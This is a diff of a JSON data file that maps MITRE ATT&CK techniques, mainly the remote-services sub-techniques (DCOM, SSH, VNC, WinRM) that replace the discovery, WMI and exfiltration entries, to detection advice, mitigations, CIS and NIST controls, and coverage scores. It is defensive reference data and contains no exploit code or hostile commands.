-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1021",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1057",
-                "name": "Data Loss Prevention",
-                "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
-                "url": "https://attack.mitre.org/mitigations/M1057"
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
             },
             {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
+                "mid": "M1035",
+                "name": "Limit Access to Resource Over Network",
+                "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1035"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             }
         ],
-        "cumulative_score": 0.31024587952380955,
-        "adjusted_score": 0.31024587952380955,
-        "has_car": false,
+        "cumulative_score": 0.638095238095238,
+        "adjusted_score": 0.638095238095238,
+        "has_car": true,
         "has_sigma": true,
-        "has_es_siem": false,
+        "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [
-            "13.3",
-            "13.8"
+            "4.1",
+            "4.2",
+            "4.4",
+            "4.5",
+            "4.7",
+            "5.2",
+            "5.3",
+            "6.1",
+            "6.2",
+            "6.8",
+            "7.6",
+            "7.7",
+            "12.2",
+            "13.4",
+            "18.2",
+            "18.3"
         ],
         "nist_controls": [
-            "AC-16",
+            "AC-17",
             "AC-2",
-            "AC-20",
-            "AC-23",
             "AC-3",
             "AC-4",
+            "AC-5",
             "AC-6",
-            "CA-3",
             "CA-7",
-            "SA-8",
-            "SA-9",
-            "SC-13",
-            "SC-28",
-            "SC-31",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
             "SC-7",
-            "SI-3",
-            "SI-4",
-            "SR-4"
+            "SI-10",
+            "SI-15",
+            "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.20952380952380953,
-            "mitigation_score": 0.36363636363636365,
-            "detection_score": 0.04
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00072207
+        "hardware_coverage": false
     },
     {
-        "tid": "T1046",
-        "name": "Network Service Scanning",
-        "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.",
-        "url": "https://attack.mitre.org/techniques/T1046",
+        "tid": "T1021.003",
+        "name": "Remote Services: Distributed Component Object Model",
+        "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.\n\nThe Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)\n\nThrough DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)",
+        "url": "https://attack.mitre.org/techniques/T1021/003",
         "tactics": [
-            "Discovery"
+            "Lateral Movement"
         ],
-        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.",
+        "detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.\n\nMonitor for any influxes or abnormal increases in DCOM related Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic (typically over port 135).",
         "platforms": [
-            "Containers",
-            "IaaS",
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Cloud Service: Cloud Service Enumeration",
-            "Command: Command Execution",
-            "Network Traffic: Network Traffic Flow"
+            "Module: Module Load",
+            "Network Traffic: Network Connection Creation",
+            "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1021",
         "subtechniques": [],
         "mitigations": [
+            {
+                "mid": "M1048",
+                "name": "Application Isolation and Sandboxing",
+                "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
+                "url": "https://attack.mitre.org/mitigations/M1048"
+            },
             {
                 "mid": "M1042",
                 "name": "Disable or Remove Feature or Program",
                 "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
                 "url": "https://attack.mitre.org/mitigations/M1042"
             },
-            {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
-            },
             {
                 "mid": "M1030",
                 "name": "Network Segmentation",
                 "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
                 "url": "https://attack.mitre.org/mitigations/M1030"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             }
         ],
-        "cumulative_score": 0.41094617523809523,
-        "adjusted_score": 0.41094617523809523,
+        "cumulative_score": 0.4476190476190476,
+        "adjusted_score": 0.4476190476190476,
         "has_car": true,
         "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": false,
+        "has_es_siem": false,
+        "has_splunk": true,
         "cis_controls": [
-            "3.12",
+            "2.3",
+            "2.5",
+            "4.1",
             "4.4",
+            "4.5",
             "4.8",
-            "7.6",
             "7.7",
             "12.2",
-            "12.8",
-            "13.3",
-            "13.8",
-            "16.8",
-            "18.2",
             "18.3",
-            "16.10"
+            "18.5"
         ],
         "nist_controls": [
+            "AC-17",
+            "AC-2",
+            "AC-3",
             "AC-4",
-            "CA-7",
+            "AC-5",
+            "AC-6",
             "CM-2",
+            "CM-5",
             "CM-6",
             "CM-7",
             "CM-8",
+            "IA-2",
             "RA-5",
+            "SC-18",
+            "SC-3",
             "SC-46",
             "SC-7",
             "SI-3",
@@ -2362,54 +2722,42 @@
         "process_coverage": true,
         "network_coverage": true,
         "file_coverage": false,
-        "cloud_coverage": true,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.29523809523809524,
-            "mitigation_score": 0.43636363636363634,
-            "detection_score": 0.14
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.01570808
+        "cloud_coverage": false,
+        "hardware_coverage": false
     },
     {
-        "tid": "T1047",
-        "name": "Windows Management Instrumentation",
-        "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM). (Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS. (Citation: MSDN WMI) (Citation: FireEye WMI 2015)\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)",
-        "url": "https://attack.mitre.org/techniques/T1047",
+        "tid": "T1021.004",
+        "name": "Remote Services: SSH",
+        "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.\n\nSSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.",
+        "url": "https://attack.mitre.org/techniques/T1021/004",
         "tactics": [
-            "Execution"
+            "Lateral Movement"
         ],
-        "detection": "Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of \"wmic\" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)",
+        "detection": "Use of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\n\nOn macOS systems log show --predicate 'process = \"sshd\"' can be used to review incoming SSH connection attempts for suspicious activity. The command log show --info --predicate 'process = \"ssh\" or eventMessage contains \"ssh\"' can be used to review outgoing SSH connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nOn Linux systems SSH activity can be found in the logs located in /var/log/auth.log or /var/log/secure depending on the distro you are using.",
         "platforms": [
-            "Windows"
+            "Linux",
+            "macOS"
         ],
         "data_sources": [
-            "Command: Command Execution",
+            "Logon Session: Logon Session Creation",
             "Network Traffic: Network Connection Creation",
             "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1021",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1040",
-                "name": "Behavior Prevention on Endpoint",
-                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                "url": "https://attack.mitre.org/mitigations/M1040"
-            },
-            {
-                "mid": "M1038",
-                "name": "Execution Prevention",
-                "description": "Block execution of code on a system through application control, and/or script blocking.",
-                "url": "https://attack.mitre.org/mitigations/M1038"
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
             },
             {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
             },
             {
                 "mid": "M1018",
@@ -2418,178 +2766,86 @@
                 "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 2.183333333333333,
-        "adjusted_score": 2.183333333333333,
-        "has_car": true,
+        "cumulative_score": 0.40476190476190477,
+        "adjusted_score": 0.40476190476190477,
+        "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [
+            "2.3",
+            "2.5",
+            "4.1",
             "4.7",
-            "5.2",
+            "4.8",
             "5.3",
-            "5.4",
             "6.1",
             "6.2",
-            "6.8"
+            "6.4",
+            "6.5",
+            "6.8",
+            "7.6",
+            "16.10",
+            "18.3",
+            "18.5"
         ],
         "nist_controls": [
             "AC-17",
             "AC-2",
+            "AC-20",
             "AC-3",
             "AC-5",
             "AC-6",
+            "AC-7",
             "CM-2",
             "CM-5",
             "CM-6",
-            "CM-7",
+            "CM-8",
             "IA-2",
+            "IA-5",
             "RA-5",
-            "SC-3",
-            "SC-34",
-            "SI-16",
-            "SI-2",
-            "SI-3",
-            "SI-4",
-            "SI-7"
+            "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": true,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.5333333333333333,
-            "mitigation_score": 0.45454545454545453,
-            "detection_score": 0.62
-        },
-        "choke_point_score": 0.65,
-        "prevalence_score": 1
+        "hardware_coverage": false
     },
     {
-        "tid": "T1048",
-        "name": "Exfiltration Over Alternative Protocol",
-        "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.  \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques) ",
-        "url": "https://attack.mitre.org/techniques/T1048",
+        "tid": "T1021.005",
+        "name": "Remote Services: VNC",
+        "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)\n\nVNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)\n\nAdversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)",
+        "url": "https://attack.mitre.org/techniques/T1021/005",
         "tactics": [
-            "Exfiltration"
+            "Lateral Movement"
         ],
-        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+        "detection": "Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.\n\nOn macOS systems log show --predicate 'process = \"screensharingd\" and eventMessage contains \"Authentication:\"' can be used to review incoming VNC connection attempts for suspicious activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nMonitor for use of built-in debugging environment variables (such as those containing credentials or other sensitive information) as well as test/default users on VNC servers, as these can leave openings for adversaries to abuse.(Citation: Gnome Remote Desktop grd-settings)(Citation: Gnome Remote Desktop gschema)",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "File: File Access",
+            "Logon Session: Logon Session Creation",
             "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow"
+            "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
+        "is_subtechnique": true,
+        "supertechnique": "T1021",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1048.001",
-                "name": "Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol",
-                "url": "https://attack.mitre.org/techniques/T1048/001",
-                "description": "Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nSymmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. \n\nNetwork protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP). ",
-                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) \n\nArtifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. ",
-                "mitigations": [
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
-                    },
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    },
-                    {
-                        "mid": "M1030",
-                        "name": "Network Segmentation",
-                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                        "url": "https://attack.mitre.org/mitigations/M1030"
-                    }
-                ]
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
             },
             {
-                "tid": "T1048.002",
-                "name": "Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol",
-                "url": "https://attack.mitre.org/techniques/T1048/002",
-                "description": "Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAsymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. \n\nNetwork protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. ",
-                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) ",
-                "mitigations": [
-                    {
-                        "mid": "M1057",
-                        "name": "Data Loss Prevention",
-                        "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
-                        "url": "https://attack.mitre.org/mitigations/M1057"
-                    },
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
-                    },
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    },
-                    {
-                        "mid": "M1030",
-                        "name": "Network Segmentation",
-                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                        "url": "https://attack.mitre.org/mitigations/M1030"
-                    }
-                ]
-            },
-            {
-                "tid": "T1048.003",
-                "name": "Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol",
-                "url": "https://attack.mitre.org/techniques/T1048/003",
-                "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ",
-                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) ",
-                "mitigations": [
-                    {
-                        "mid": "M1057",
-                        "name": "Data Loss Prevention",
-                        "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
-                        "url": "https://attack.mitre.org/mitigations/M1057"
-                    },
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
-                    },
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    },
-                    {
-                        "mid": "M1030",
-                        "name": "Network Segmentation",
-                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                        "url": "https://attack.mitre.org/mitigations/M1030"
-                    }
-                ]
-            }
-        ],
-        "mitigations": [
-            {
-                "mid": "M1057",
-                "name": "Data Loss Prevention",
-                "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
-                "url": "https://attack.mitre.org/mitigations/M1057"
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
             },
             {
                 "mid": "M1037",
@@ -2598,127 +2854,168 @@
                 "url": "https://attack.mitre.org/mitigations/M1037"
             },
             {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
-            },
-            {
-                "mid": "M1030",
-                "name": "Network Segmentation",
-                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                "url": "https://attack.mitre.org/mitigations/M1030"
+                "mid": "M1033",
+                "name": "Limit Software Installation",
+                "description": "Block users or groups from installing unapproved software.",
+                "url": "https://attack.mitre.org/mitigations/M1033"
             }
         ],
-        "cumulative_score": 0.520876359047619,
-        "adjusted_score": 0.520876359047619,
+        "cumulative_score": 0.4666666666666667,
+        "adjusted_score": 0.4666666666666667,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
+            "2.1",
+            "2.2",
+            "2.3",
+            "2.4",
+            "2.5",
             "4.2",
             "4.4",
+            "4.5",
+            "4.8",
             "7.6",
             "7.7",
-            "9.2",
-            "12.2",
-            "12.8",
-            "13.3",
             "13.4",
-            "13.8"
+            "18.2",
+            "18.3",
+            "18.5"
         ],
         "nist_controls": [
-            "AC-16",
+            "AC-17",
             "AC-2",
-            "AC-20",
-            "AC-23",
             "AC-3",
             "AC-4",
             "AC-6",
-            "CA-3",
             "CA-7",
+            "CA-8",
+            "CM-11",
             "CM-2",
+            "CM-3",
+            "CM-5",
             "CM-6",
             "CM-7",
-            "SA-8",
-            "SA-9",
-            "SC-28",
-            "SC-31",
-            "SC-46",
+            "CM-8",
+            "IA-2",
+            "IA-4",
+            "IA-6",
+            "RA-5",
             "SC-7",
             "SI-10",
             "SI-15",
             "SI-3",
-            "SI-4",
-            "SR-4"
+            "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.419047619047619,
-            "mitigation_score": 0.6,
-            "detection_score": 0.22
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00182874
+        "hardware_coverage": false
     },
     {
-        "tid": "T1049",
-        "name": "System Network Connections Discovery",
-        "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \n\nAn adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview)\n\nUtilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), \"net use,\" and \"net session\" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to \"net session\".",
-        "url": "https://attack.mitre.org/techniques/T1049",
+        "tid": "T1021.006",
+        "name": "Remote Services: Windows Remote Management",
+        "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\n\nWinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM  can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)",
+        "url": "https://attack.mitre.org/techniques/T1021/006",
         "tactics": [
-            "Discovery"
+            "Lateral Movement"
         ],
-        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "detection": "Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior.  Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement) Also monitor for remote WMI connection attempts (typically over port 5985 when using HTTP and 5986 for HTTPS).",
         "platforms": [
-            "IaaS",
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
